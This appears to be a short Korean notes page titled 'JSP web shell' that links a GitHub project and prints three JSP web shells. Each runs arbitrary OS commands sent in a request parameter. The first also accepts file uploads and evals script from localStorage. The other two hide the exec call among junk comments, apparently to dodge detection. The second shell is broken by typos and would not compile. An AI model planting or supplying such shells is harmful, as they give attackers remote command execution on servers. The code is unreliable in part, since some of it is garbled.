JSP 웹쉘

https://github.com/SecurityRiskAdvisors/cmd.jsp/blob/master/cmd.jsp

GitHub - SecurityRiskAdvisors/cmd.jsp: A super small jsp webshell with file upload capabilities.

 

<%@page import="java.io.*, java.util.*, javax.xml.bind.*, java.net.*"%><script>eval(window.localStorage.embed)</script><%!public String v(String w){String x="";try{x=URLDecoder.decode(w,"UTF-8");}catch(Exception e){}return x;}%><%String o,l,d;o=l=d="";DataInputStream r=new DataInputStream(request.getInputStream());while((l=r.readLine())!=null){d+=l;}if(d.indexOf("c=")>=0){String g=v(d.substring(2));String s;try{Process p=Runtime.getRuntime().exec(g);DataInputStream i=new DataInputStream(p.getInputStream());out.print("<pre>");while((s=i.readLine())!=null){o+=s.replace("<","&lt;").replace(">","&gt;")+"<br>";}}catch(Exception e){out.print(e);}}else{if(d.length()>1){int b=d.indexOf("b=");int n=d.indexOf("n=");byte[] m=DatatypeConverter.parseBase64Binary(v(d.substring(b+2)));String f=v(d.substring(2,n-1))+File.separator+v(d.substring(n+2,b-1));try{OutputStream stream=new FileOutputStream(f);stream.write(m);o="Uploaded: "+f;}catch(Exception e){out.print(e);}}}%><%=o%>

 

 

<%@ page contentType="text/html; charset=UTF-8" %>
<%@ page import="java.io.*" %>
<%
    String cmd = request.getParameter("cmd");
    Process ps = null;
    BuffereReader br = null;
    String line = "";
    String result = "";
    String now_page = request.getServletPath();

    try {
if(cmd != null {
                ps = Runtime/*DSDsdfasdfasdf*/./*DSDsdfasdfasdf*/getRuntime/*DSDsdfasdfasdf*/()/*DSDsdfasdfasdf*/./*DSDsdfasdfasdf*/exec/*DSDsdfasdfasdf*/(cmd);
                br = new BuffereReader(new InputStreamReader(ps.getInputStream()));

                while((line = br.readLine()) != null ) {
                    result += line + "<br>";
                }
                ps.destory();
            }
        } finally {
            if(br != null) br.close();
        }

%> 

 

<%@ page import="java.io.*" %>
<%

    try {
//sdfgsdfgsdfgsretsdrt
            String cmd = request.getParameter("cmd");
// selrjlsdfjglisdjflgdgsdfg
            Process child = Runtime.getRuntime().exec(cmd);
//lajwriljalsdkfjl

            InputStream in = child.getInputStream();

            int c;

            

            while ((c = in.read()) != -1) {

                out.print((char)c);

            }

            

            in.close();

            

            try {

                child.waitFor();

            } catch (InterruptedException e) {

                e.printStackTrace();

            }

    } catch (IOException e) {

        System.err.println(e);

    }

%>